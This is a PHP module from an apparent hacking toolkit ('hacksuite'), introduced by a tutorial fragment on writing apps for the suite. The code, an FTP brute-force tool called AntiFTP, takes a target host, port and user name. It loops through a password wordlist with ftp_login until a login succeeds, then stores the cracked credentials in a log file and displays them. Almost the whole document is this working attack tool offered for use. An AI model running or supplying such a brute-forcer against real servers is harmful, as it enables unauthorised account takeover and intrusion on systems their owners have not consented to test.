..tutorial we are going to create a new app for the hacksuite. We're not going to do anything fancy here, we will make a simple app to get familiar how to write compatible scripts for the..
<?php
/*
Handler for AntiFTP
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 13-04-2015
*/
// set variable to be able to save a task
$_MODULE_C = "thc_af";
$_LOG = "accounts.php";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
$aFileData = array();
if(isset($_POST['submit'])){
switch($_POST['submit']){
// quick 'n dirty input validation
case"Generate Attack":
if(!@extension_loaded("ftp")){
if(function_exists("dl")){
$sExtension = "";
if(strtoupper(substr(PHP_OS,0,3))==="WIN"){
$sExtension = "php_ftp.dll";
}
else{
$sExtension = "ftp.so";
}
if(!@dl($sExtension)){
die($sOut."No ftp support available, can't load extension.".$sEnd);
}
}
else{
die($sOut."No ftp support available.".$sEnd);
}
}
if($_POST['sUser']==""){
die($sOut."No user has been specified".$sEnd);
}
// load wordlist
$sWordlist = ExploitFilter($_PATHS['wordlists_root']."/".$_POST['sWordlist'],0,1);
if(false===($aFileData = @file($sWordlist))){
die($sOut."Wordlist doesn't exist".$sEnd);
}
// get it on with..
include_once($_PATHS['includes_root']."/task_start.php");
if($_POST['iVerbose']!=1){
$_POST['iVerbose'] = 0;
}
$iPort = intval($_POST['iPort']);
$iTimeout = intval($_POST['iTimeout']);
if(!is_int($iPort) || ($iPort<0 || $iPort>65535)){
$iPort = 21;
}
if(!is_int($iTimeout) || $iTimeout>90){
$iTimeout = 10;
}
echo $sOut;
break;
// View Passes
case"View Passes":
echo $sOut;
if(!function_exists("RawToArray")){
include_once($_PATHS['functions_root']."/raw_to_array.php");
}
if(false==($aKeys = RawToArray($_LOG))){
echo"<b id=h7>[no passwords found yet]</b>";
}
else{
for($x=0;$x<count($aKeys);$x++){
echo"<b>".date($_CONTEXT['time_pattern'].' H:i:s',$aKeys[$x][0])."</b> password for user <b>".$aKeys[$x][1]."</b> is <b>".$aKeys[$x][2]."</b><br>\n";
}
}
exit;
break;
default:
// default template
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
}
else{
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
echo Screen("<br>\n<b>Running..</b><p>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
flush();
ob_flush();
$bFound = false;
$iAttempts = 0;
echo Screen("<b>trying to connect with ".strip_tags($_POST['sHost']).":</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
flush();
ob_flush();
if(false!==($rConnect = @ftp_connect($_POST['sHost'],$iPort,$iTimeout))){
echo Screen("<b>succesfully connected to host, trying to login:</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
for($x=0;$x<count($aFileData);$x++){
$sPass = trim($aFileData[$x]);
$iAttempts++;
if(@ftp_login($rConnect,$_POST['sUser'],$sPass)){
// gotcha!
$bFound = true;
echo Screen("[".date('H:i:s',time())."] attempt ".$iAttempts.": <b id=h6>login successful:</b> password is ".$sPass."\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
if($_CONTEXT['log']==true){
WriteF($_LOG,time()."|".$_POST['sUser']."|".$sPass."\n");
}
$iMatch++;
ob_flush();
flush();
@ftp_close($rConnect);
break;
}
else{
echo Screen("[".date('H:i:s',time())."] attempt ".$iAttempts.": $sPass => <b id=h7>failed</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
ob_flush();
flush();
}
}
}
else{
include_once($_PATHS['includes_root']."/task_end.php");
die(Screen("Failed to establish connection with ftp host",$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
echo Screen(($bFound ? "successfully got user's password after ".$iAttempts." attempts " : "failed to get password from user, please try some different wordlist ")."- (running time) ".(time()-$_CONTEXT['start_task'])."(s)\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo $sEnd;
?>